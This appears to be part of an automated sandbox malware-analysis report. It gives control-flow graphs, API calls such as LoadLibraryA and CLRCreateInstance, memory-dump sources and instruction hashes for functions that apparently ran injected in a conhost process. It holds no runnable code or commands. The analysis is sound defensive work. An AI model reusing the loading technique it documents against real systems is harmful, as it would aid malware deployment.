                                                                                                                                    execution_graph 2152 1b0f39cd0af LoadLibraryA 2153 1b0f39cd0c7 2152->2153 2154 1b0f39cdf06 2155 1b0f39cdf28 2154->2155 2156 1b0f39ce054 LoadLibraryA 2155->2156 2157 1b0f39cdf7c 2155->2157 2158 1b0f39ce069 2155->2158 2156->2155 2158->2157 2165 1b0f39ce11d 2158->2165 2173 1b0f39cd0a2 2158->2173 2160 1b0f39ce0f3 2161 1b0f39ce0f7 2160->2161 2166 1b0f39cd1ba LoadLibraryA 2160->2166 2161->2157 2161->2160 2164 1b0f39ce10c 2164->2157 2164->2165 2165->2157 2168 1b0f39cdcb2 2165->2168 2167 1b0f39cd1df 2166->2167 2167->2164 2169 1b0f39cdcf2 CLRCreateInstance 2168->2169 2171 1b0f39cdd0b 2168->2171 2169->2171 2170 1b0f39cdeb2 2170->2157 2171->2170 2172 1b0f39cdea9 SafeArrayDestroy 2171->2172 2172->2170 2174 1b0f39cd0af LoadLibraryA 2173->2174 2175 1b0f39cd0c7 2174->2175 2175->2160

                                                                                                                                    Executed Functions

                                                                                                                                    Function 000001B0F39CDF06, Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 35 1b0f39cdf06-1b0f39cdf57 call 1b0f39cf0de * 3 42 1b0f39cdf89 35->42 43 1b0f39cdf59-1b0f39cdf5c 35->43 45 1b0f39cdf8c-1b0f39cdf9d 42->45 43->42 44 1b0f39cdf5e-1b0f39cdf61 43->44 44->42 46 1b0f39cdf63-1b0f39cdf7a 44->46 48 1b0f39cdf7c-1b0f39cdf83 46->48 49 1b0f39cdf9e-1b0f39cdfc9 call 1b0f39cf65e call 1b0f39cf67e 46->49 48->42 50 1b0f39cdf85 48->50 55 1b0f39cdfcb-1b0f39ce000 call 1b0f39cf292 call 1b0f39cf152 49->55 56 1b0f39ce006-1b0f39ce01d call 1b0f39cf0de 49->56 50->42 55->56 65 1b0f39ce262-1b0f39ce273 55->65 56->42 62 1b0f39ce023-1b0f39ce024 56->62 64 1b0f39ce02a-1b0f39ce030 62->64 66 1b0f39ce069-1b0f39ce073 64->66 67 1b0f39ce032 64->67 70 1b0f39ce275-1b0f39ce27f 65->70 71 1b0f39ce2a6-1b0f39ce2c7 call 1b0f39cf67e 65->71 68 1b0f39ce075-1b0f39ce090 call 1b0f39cf0de 66->68 69 1b0f39ce0a1-1b0f39ce0aa 66->69 72 1b0f39ce034-1b0f39ce036 67->72 68->65 87 1b0f39ce096-1b0f39ce09f 68->87 75 1b0f39ce0ac-1b0f39ce0b6 call 1b0f39cd2d2 69->75 76 1b0f39ce0c5-1b0f39ce0c8 69->76 70->71 77 1b0f39ce281-1b0f39ce29f call 1b0f39cf67e 70->77 98 1b0f39ce2cd-1b0f39ce2cf 71->98 99 1b0f39ce2c9 71->99 78 1b0f39ce038-1b0f39ce03e 72->78 79 1b0f39ce050-1b0f39ce052 72->79 75->65 95 1b0f39ce0bc-1b0f39ce0c3 75->95 76->65 84 1b0f39ce0ce-1b0f39ce0d8 76->84 77->71 78->79 86 1b0f39ce040-1b0f39ce04e 78->86 79->66 80 1b0f39ce054-1b0f39ce067 LoadLibraryA 79->80 80->64 89 1b0f39ce0da-1b0f39ce0db 84->89 90 1b0f39ce0e2-1b0f39ce0e9 84->90 86->72 86->79 87->68 87->69 89->90 92 1b0f39ce11d-1b0f39ce121 90->92 93 1b0f39ce0eb-1b0f39ce0ec 90->93 100 1b0f39ce1fd-1b0f39ce205 92->100 101 1b0f39ce127-1b0f39ce149 92->101 97 1b0f39ce0ee call 1b0f39cd0a2 93->97 95->90 102 1b0f39ce0f3-1b0f39ce0f5 97->102 98->45 99->98 103 1b0f39ce257-1b0f39ce25d call 1b0f39ce70e 100->103 104 1b0f39ce207-1b0f39ce20d 100->104 101->65 113 1b0f39ce14f-1b0f39ce169 call 1b0f39cf65e 101->113 105 1b0f39ce104-1b0f39ce107 call 1b0f39cd1ba 102->105 106 1b0f39ce0f7-1b0f39ce0fe 102->106 103->65 109 1b0f39ce20f-1b0f39ce215 104->109 110 1b0f39ce224-1b0f39ce236 call 1b0f39cdcb2 104->110 116 1b0f39ce10c-1b0f39ce10e 105->116 106->65 106->105 109->65 114 1b0f39ce217-1b0f39ce222 call 1b0f39ceb6a 109->114 119 1b0f39ce248-1b0f39ce255 call 1b0f39cd752 110->119 120 1b0f39ce238-1b0f39ce243 call 1b0f39ce2d6 110->120 126 1b0f39ce189-1b0f39ce1b2 113->126 127 1b0f39ce16b-1b0f39ce16e 113->127 114->65 116->92 121 1b0f39ce110-1b0f39ce117 116->121 119->65 120->119 121->65 121->92 126->65 133 1b0f39ce1b8-1b0f39ce1f8 126->133 127->100 128 1b0f39ce174-1b0f39ce187 call 1b0f39cf3e2 127->128 134 1b0f39ce1fa-1b0f39ce1fb 128->134 133->65 133->134 134->100
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.749860371.000001B0F37B0000.00000040.00000001.sdmp, Offset: 000001B0F37B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1b0f37b0000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction ID: d5edf75a74a1130e2f8840bcd226e8e760f4be83f42b118c5f77cc04e2933580
                                                                                                                                    • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                                                                                                                    • Instruction Fuzzy Hash: C0C176307189065BEB7AEA2884D57FBB3D1FB9C361F54612DD44BC7286DF20E8528781
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626044A, Relevance: .8, Instructions: 779COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 200 7ffa3626044a-7ffa36260520 call 7ffa36260108 * 2 213 7ffa36260549 200->213 214 7ffa36260522-7ffa36260541 200->214 216 7ffa3626054e-7ffa36260585 call 7ffa36260110 213->216 217 7ffa36260547 214->217 218 7ffa36260735-7ffa3626075c call 7ffa36260108 214->218 234 7ffa36260587-7ffa362605fb call 7ffa36260108 * 2 call 7ffa36260118 216->234 235 7ffa36260602-7ffa36260676 call 7ffa36260108 * 2 call 7ffa36260118 216->235 217->216 228 7ffa36260830-7ffa362608b0 call 7ffa36260100 218->228 229 7ffa36260762-7ffa36260829 call 7ffa36260110 call 7ffa36260108 call 7ffa36260100 call 7ffa36260108 218->229 271 7ffa362608ce 228->271 272 7ffa362608b2-7ffa362608c3 228->272 229->228 264 7ffa36260600 234->264 263 7ffa3626067b-7ffa3626072d call 7ffa36260108 * 2 call 7ffa36260118 235->263 307 7ffa36260734 263->307 264->263 274 7ffa362608d4-7ffa36260906 271->274 272->274 279 7ffa362608c5-7ffa362608cd 272->279 282 7ffa3626093c-7ffa36260a22 call 7ffa36260108 * 2 274->282 283 7ffa36260908-7ffa36260919 274->283 279->271 314 7ffa36260ae7-7ffa36260b09 call 7ffa36260e0c call 7ffa36260100 282->314 315 7ffa36260a28-7ffa36260a3d 282->315 283->282 285 7ffa3626091b-7ffa36260935 283->285 285->282 307->218 326 7ffa36260b0f-7ffa36260b78 call 7ffa36260198 call 7ffa362601a0 314->326 327 7ffa36260cde-7ffa36260cfd 314->327 319 7ffa36260a3f-7ffa36260a4c 315->319 320 7ffa36260a56-7ffa36260a59 315->320 319->320 328 7ffa36260a4e-7ffa36260a54 319->328 323 7ffa36260a5b-7ffa36260a73 320->323 324 7ffa36260ad3-7ffa36260ae1 320->324 323->324 334 7ffa36260a75-7ffa36260aca call 7ffa36260108 323->334 324->314 324->315 326->327 328->320 334->324 348 7ffa36260acc 334->348 348->324
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f7cf7e0937e2fe5d66fce5a7f62b865d735f79fc4290c52dc5585b663465adf9
                                                                                                                                    • Instruction ID: 9957fd9a685f62cdc2fb7fd7020e8ccca9da77ec9dc9b97c7e1590fcdd09d602
                                                                                                                                    • Opcode Fuzzy Hash: f7cf7e0937e2fe5d66fce5a7f62b865d735f79fc4290c52dc5585b663465adf9
                                                                                                                                    • Instruction Fuzzy Hash: 3F32E670E08A494FF799EB688455AB977E1EF6A300F4180BAD40DD73E3DE2A6C41D781
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36265076, Relevance: .5, Instructions: 473COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 349 7ffa36265076-7ffa36265083 350 7ffa3626508e-7ffa36265157 349->350 351 7ffa36265085-7ffa3626508d 349->351 355 7ffa36265159-7ffa36265162 350->355 356 7ffa362651c3 350->356 351->350 355->356 357 7ffa36265164-7ffa36265170 355->357 358 7ffa362651c5-7ffa362651ea 356->358 359 7ffa362651a9-7ffa362651c1 357->359 360 7ffa36265172-7ffa36265184 357->360 365 7ffa362651ec-7ffa362651f5 358->365 366 7ffa36265256 358->366 359->358 361 7ffa36265186 360->361 362 7ffa36265188-7ffa3626519b 360->362 361->362 362->362 364 7ffa3626519d-7ffa362651a5 362->364 364->359 365->366 368 7ffa362651f7-7ffa36265203 365->368 367 7ffa36265258-7ffa36265300 366->367 379 7ffa3626536e 367->379 380 7ffa36265302-7ffa3626530c 367->380 369 7ffa3626523c-7ffa36265254 368->369 370 7ffa36265205-7ffa36265217 368->370 369->367 372 7ffa3626521b-7ffa3626522e 370->372 373 7ffa36265219 370->373 372->372 375 7ffa36265230-7ffa36265238 372->375 373->372 375->369 381 7ffa36265370-7ffa36265399 379->381 380->379 382 7ffa3626530e-7ffa3626531b 380->382 389 7ffa3626539b-7ffa362653a6 381->389 390 7ffa36265403 381->390 383 7ffa3626531d-7ffa3626532f 382->383 384 7ffa36265354-7ffa3626536c 382->384 386 7ffa36265331 383->386 387 7ffa36265333-7ffa36265346 383->387 384->381 386->387 387->387 388 7ffa36265348-7ffa36265350 387->388 388->384 389->390 391 7ffa362653a8-7ffa362653b6 389->391 392 7ffa36265405-7ffa36265496 390->392 393 7ffa362653ef-7ffa36265401 391->393 394 7ffa362653b8-7ffa362653ca 391->394 400 7ffa3626549c-7ffa362654ab 392->400 393->392 396 7ffa362653ce-7ffa362653e1 394->396 397 7ffa362653cc 394->397 396->396 398 7ffa362653e3-7ffa362653eb 396->398 397->396 398->393 401 7ffa362654ad 400->401 402 7ffa362654b3-7ffa36265518 call 7ffa36265534 400->402 401->402 409 7ffa3626551f-7ffa36265533 402->409 410 7ffa3626551a 402->410 410->409
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 267f845ae041256a5adc270de2bca0357200af74dffc7d26e976ce813a29aee9
                                                                                                                                    • Instruction ID: 6529a07bd0bbd0a3601c8ffdca9d1cbb0764a1eea215389ef6f60a42ee2410f0
                                                                                                                                    • Opcode Fuzzy Hash: 267f845ae041256a5adc270de2bca0357200af74dffc7d26e976ce813a29aee9
                                                                                                                                    • Instruction Fuzzy Hash: 16F1A730908A8D8FEBA8DF28C855BE937E1FF55310F14826ED84DC7291DF75A9458B81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36265E22, Relevance: .5, Instructions: 459COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 411 7ffa36265e22-7ffa36265e2f 412 7ffa36265e31-7ffa36265e39 411->412 413 7ffa36265e3a-7ffa36265f07 411->413 412->413 417 7ffa36265f09-7ffa36265f12 413->417 418 7ffa36265f73 413->418 417->418 419 7ffa36265f14-7ffa36265f20 417->419 420 7ffa36265f75-7ffa36265f9a 418->420 421 7ffa36265f59-7ffa36265f71 419->421 422 7ffa36265f22-7ffa36265f34 419->422 426 7ffa36265f9c-7ffa36265fa5 420->426 427 7ffa36266006 420->427 421->420 424 7ffa36265f36 422->424 425 7ffa36265f38-7ffa36265f4b 422->425 424->425 425->425 428 7ffa36265f4d-7ffa36265f55 425->428 426->427 429 7ffa36265fa7-7ffa36265fb3 426->429 430 7ffa36266008-7ffa3626602d 427->430 428->421 431 7ffa36265fec-7ffa36266004 429->431 432 7ffa36265fb5-7ffa36265fc7 429->432 437 7ffa3626602f-7ffa36266039 430->437 438 7ffa3626609b 430->438 431->430 433 7ffa36265fcb-7ffa36265fde 432->433 434 7ffa36265fc9 432->434 433->433 436 7ffa36265fe0-7ffa36265fe8 433->436 434->433 436->431 437->438 440 7ffa3626603b-7ffa36266048 437->440 439 7ffa3626609d-7ffa362660cb 438->439 447 7ffa3626613b 439->447 448 7ffa362660cd-7ffa362660d8 439->448 441 7ffa36266081-7ffa36266099 440->441 442 7ffa3626604a-7ffa3626605c 440->442 441->439 443 7ffa3626605e 442->443 444 7ffa36266060-7ffa36266073 442->444 443->444 444->444 446 7ffa36266075-7ffa3626607d 444->446 446->441 449 7ffa3626613d-7ffa36266215 447->449 448->447 450 7ffa362660da-7ffa362660e8 448->450 460 7ffa3626621b-7ffa3626622a 449->460 451 7ffa36266121-7ffa36266139 450->451 452 7ffa362660ea-7ffa362660fc 450->452 451->449 454 7ffa362660fe 452->454 455 7ffa36266100-7ffa36266113 452->455 454->455 455->455 457 7ffa36266115-7ffa3626611d 455->457 457->451 461 7ffa3626622c 460->461 462 7ffa36266232-7ffa36266294 call 7ffa362662b0 460->462 461->462 469 7ffa3626629b-7ffa362662af 462->469 470 7ffa36266296 462->470 470->469
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5cf76abe9f8c37dcbdb575d103e86b54b55317219d62fd32f496f385deba1e82
                                                                                                                                    • Instruction ID: 9052d5177b49f83c4fa58527a376f285e8e85f0277765c3c6006271161163ba0
                                                                                                                                    • Opcode Fuzzy Hash: 5cf76abe9f8c37dcbdb575d103e86b54b55317219d62fd32f496f385deba1e82
                                                                                                                                    • Instruction Fuzzy Hash: 1FE19330908A8D8FEBA8DF68C855BE977D1FB65310F14827EE84DC7291DF75A8448782
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 000001B0F39CDCB2, Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.749860371.000001B0F37B0000.00000040.00000001.sdmp, Offset: 000001B0F37B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1b0f37b0000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArrayCreateDestroyInstanceSafe
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3902440814-0
                                                                                                                                    • Opcode ID: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction ID: 71fc2c523a8e32dee621113dadf49e863bbeec069b7d9abcd0fca07a3c5b4d4c
                                                                                                                                    • Opcode Fuzzy Hash: e3a29ec6c90617ad7c1928cbae39db72877cdd96e7781ee4f5e73e7a13d7ce10
                                                                                                                                    • Instruction Fuzzy Hash: 51815C31308A098FD769EF28C888BA777E1FFA9351F001A6D949BC7151EF31E5458B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 000001B0F39CD1BA, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 136 1b0f39cd1ba-1b0f39cd1dd LoadLibraryA 137 1b0f39cd1df-1b0f39cd1e4 136->137 138 1b0f39cd1e9-1b0f39cd1fc 136->138 139 1b0f39cd2c0-1b0f39cd2d0 137->139 141 1b0f39cd2be 138->141 142 1b0f39cd202-1b0f39cd213 138->142 141->139 142->141 143 1b0f39cd219-1b0f39cd231 142->143 143->141 145 1b0f39cd237-1b0f39cd26b call 1b0f39cf65e 143->145 145->141 150 1b0f39cd26d-1b0f39cd27e 145->150 150->141 151 1b0f39cd280-1b0f39cd297 150->151 151->141 153 1b0f39cd299-1b0f39cd2b9 call 1b0f39cf65e 151->153 153->137
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.749860371.000001B0F37B0000.00000040.00000001.sdmp, Offset: 000001B0F37B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1b0f37b0000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction ID: 2a8ea9b0acbbcc9f1ca8842df259ed36af01bcb02223dd8d238f58f29baa9270
                                                                                                                                    • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                                                                                                                    • Instruction Fuzzy Hash: 3131943130CA094FEB59AA68E8893AA73D5E7D8360F00255DEC4BC3286DF64DD0687D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 000001B0F39CD0AF, Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 157 1b0f39cd0af-1b0f39cd0c5 LoadLibraryA 158 1b0f39cd0c7-1b0f39cd0cc 157->158 159 1b0f39cd0d1-1b0f39cd0e4 157->159 160 1b0f39cd1a8-1b0f39cd1b8 158->160 162 1b0f39cd0ea-1b0f39cd0fb 159->162 163 1b0f39cd1a6 159->163 162->163 164 1b0f39cd101-1b0f39cd119 162->164 163->160 164->163 166 1b0f39cd11f-1b0f39cd153 call 1b0f39cf65e 164->166 166->163 171 1b0f39cd155-1b0f39cd166 166->171 171->163 172 1b0f39cd168-1b0f39cd17f 171->172 172->163 174 1b0f39cd181-1b0f39cd1a1 call 1b0f39cf65e 172->174 174->158
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.749860371.000001B0F37B0000.00000040.00000001.sdmp, Offset: 000001B0F37B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1b0f37b0000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction ID: e1c671e279fbad33eca25266da90d42e3be84c105a66fb901609cd14dfacabc5
                                                                                                                                    • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                                                                                                                    • Instruction Fuzzy Hash: 8631813130CA094BEB69BA5C98957AA73D6E7D8360F00225DDC0BC72CADF60DD4687C1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 000001B0F39CD0A2, Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 178 1b0f39cd0a2-1b0f39cd0c5 LoadLibraryA 180 1b0f39cd0c7-1b0f39cd0cc 178->180 181 1b0f39cd0d1-1b0f39cd0e4 178->181 182 1b0f39cd1a8-1b0f39cd1b8 180->182 184 1b0f39cd0ea-1b0f39cd0fb 181->184 185 1b0f39cd1a6 181->185 184->185 186 1b0f39cd101-1b0f39cd119 184->186 185->182 186->185 188 1b0f39cd11f-1b0f39cd153 call 1b0f39cf65e 186->188 188->185 193 1b0f39cd155-1b0f39cd166 188->193 193->185 194 1b0f39cd168-1b0f39cd17f 193->194 194->185 196 1b0f39cd181-1b0f39cd1a1 call 1b0f39cf65e 194->196 196->180
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.749860371.000001B0F37B0000.00000040.00000001.sdmp, Offset: 000001B0F37B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1b0f37b0000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction ID: 53f2b7f86efd205fc5587a5c87d315a3e9505da6be45da86d0b73a6d2df53351
                                                                                                                                    • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                                                                                                                    • Instruction Fuzzy Hash: E5E0D83130CA0D1FF768A59DD88A7B776D8D7993B1F00202FE549C2102E645989203A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36261495, Relevance: .4, Instructions: 358COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a580658f422bbc34bf056144657a8aba768848e1a0047656fbe4407130c37432
                                                                                                                                    • Instruction ID: a8a824bfc74d2299af0a95be7a9939cee3465672d14994a932f9d9df6e87231e
                                                                                                                                    • Opcode Fuzzy Hash: a580658f422bbc34bf056144657a8aba768848e1a0047656fbe4407130c37432
                                                                                                                                    • Instruction Fuzzy Hash: C8B10830E08F494FF796EB2C84556B57BE1FFAA300B4580B9D45DC7392DE2AAC419781
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36260120, Relevance: .3, Instructions: 273COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fc102d6802948f90680937648ed60702b6e90b635e1cb0d919240852adf722dc
                                                                                                                                    • Instruction ID: 63c1c1b132d98f173b079775feeddd7a1c5e74d2b0e9fd59fcb99099e33ae7d0
                                                                                                                                    • Opcode Fuzzy Hash: fc102d6802948f90680937648ed60702b6e90b635e1cb0d919240852adf722dc
                                                                                                                                    • Instruction Fuzzy Hash: 0371C830F1CA494FEB98EB6C9885AB977D1EF9A300F058179E44EC3392DD25EC428741
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA362611A1, Relevance: .2, Instructions: 249COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b595bf5f2bd02892037f139f09f6535f317a15ff89bacb56e262bdf4dbc7a31e
                                                                                                                                    • Instruction ID: d8cc0fee1db1f29988d25ff4bfc2c51caa9bf2e919bf2c41e238e8146278d787
                                                                                                                                    • Opcode Fuzzy Hash: b595bf5f2bd02892037f139f09f6535f317a15ff89bacb56e262bdf4dbc7a31e
                                                                                                                                    • Instruction Fuzzy Hash: 0761C930E1CA494FEB98EB6C9849AB97BE1EF6A310F058179E44DC3393DD65AC428741
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA3626101A, Relevance: .2, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 671 7ffa3626101a-7ffa36261021 672 7ffa3626102a-7ffa3626103b 671->672 673 7ffa36261023 671->673 674 7ffa3626103d 672->674 675 7ffa36261044-7ffa36261053 672->675 673->672 674->675 676 7ffa3626105c-7ffa3626106b 675->676 677 7ffa36261055 675->677 678 7ffa3626106d 676->678 679 7ffa36261074-7ffa36261083 676->679 677->676 678->679 680 7ffa3626108c-7ffa3626109b 679->680 681 7ffa36261085 679->681 682 7ffa3626109d 680->682 683 7ffa362610a4-7ffa362610b3 680->683 681->680 682->683 684 7ffa362610bc-7ffa362610cb 683->684 685 7ffa362610b5 683->685 686 7ffa362610cd 684->686 687 7ffa362610d4-7ffa362610e3 684->687 685->684 686->687 688 7ffa362610ec-7ffa362610fb 687->688 689 7ffa362610e5 687->689 690 7ffa362610fd 688->690 691 7ffa36261104-7ffa36261113 688->691 689->688 690->691 692 7ffa3626111c-7ffa3626112b 691->692 693 7ffa36261115 691->693 694 7ffa3626112d 692->694 695 7ffa36261134-7ffa36261143 692->695 693->692 694->695 696 7ffa3626114c-7ffa36261172 695->696 697 7ffa36261145 695->697 700 7ffa36261179-7ffa3626117e call 7ffa36260120 696->700 697->696 702 7ffa36261183-7ffa3626119a 700->702
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.755902622.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffa36260000_conhost.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 95cb7957ed2c41fe9c6ac03830c0f913a644a4e6607b73ab756ea57abdde5f94
                                                                                                                                    • Instruction ID: 4b10d09ee4ab721319325f0895deb5d61013bdb5920f8af982e3717ddf447de6
                                                                                                                                    • Opcode Fuzzy Hash: 95cb7957ed2c41fe9c6ac03830c0f913a644a4e6607b73ab756ea57abdde5f94
                                                                                                                                    • Instruction Fuzzy Hash: 8751532094E3C16FE34793789C69E953FA16F83354F1E81DAE4C9CA0B3CAAA1495D712
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00007FFA36266580, Relevance: .1, Instructions: 70COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
